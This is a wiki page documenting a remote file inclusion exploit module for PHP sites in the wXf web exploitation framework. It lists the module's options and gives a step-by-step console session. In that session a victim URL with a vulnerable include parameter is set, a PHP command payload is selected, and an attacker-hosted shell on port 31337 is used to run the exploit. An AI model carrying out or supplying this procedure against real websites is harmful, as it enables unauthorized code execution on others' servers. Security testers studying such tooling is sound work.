Skip to content

exploit rfi php generic

Jump to bottom Edit New page
cktricky edited this page Jul 26, 2011 · 3 revisions

Author(s):

Ken Johnson (CKTRICKY)

Description:

Module Options:

COOKIE                                       true       Example: uniquecookie=cookievalue
PROXYA                                       false      Proxy IP Address
PROXYP                                       false      Proxy Port Number
RURL       http://www.example.com/test.php   true       Target address
THROTTLE   0                                 false      Specify a number, after x requests we pause

Options Explained (Module Specific):

RURL -- This will actually contain your victim URL and the RFI string.

COOKIES -- If you have a cookie or cookies that you'd like to add to the request (whether GET or POST, doesn't matter), go ahead and set them here like so:

SINGLE COOKIE

set COOKIES ASPSESSIONID=1234;

MULTI COOKIE

set COOKIES ASPSESSIONID=1234; ASP.NET_SessionId=5678;

Real world example:

My IP is 192.168.1.120 and I'd like to host a shell on port 31337. Additionally, I have an RFI string that is /index.php?some_auto_config_load=. The victim path to index.php is http://www.victim.com/mysite.

This is how you'd set your options:

wXf //> use exploit/rfi/php/generic 
wXf exploit(generic)//> set RURL http://www.victim.com/mysite/index.php?some_auto_config_load=
-{+}- RURL => http://www.victim.com/mysite/index.php?some_auto_config_load=
wXf exploit(generic)//> set PAYLOAD payload/rfi/php/cmd_single 
-{+}-  PAYLOAD => payload/rfi/php/cmd_single
wXf exploit(generic)//> set LURL http://192.168.1.120:31337
-{+}- LURL => http://192.168.1.120:31337
wXf exploit(generic)//> exploit
Add a custom footer
Add a custom sidebar
Clone this wiki locally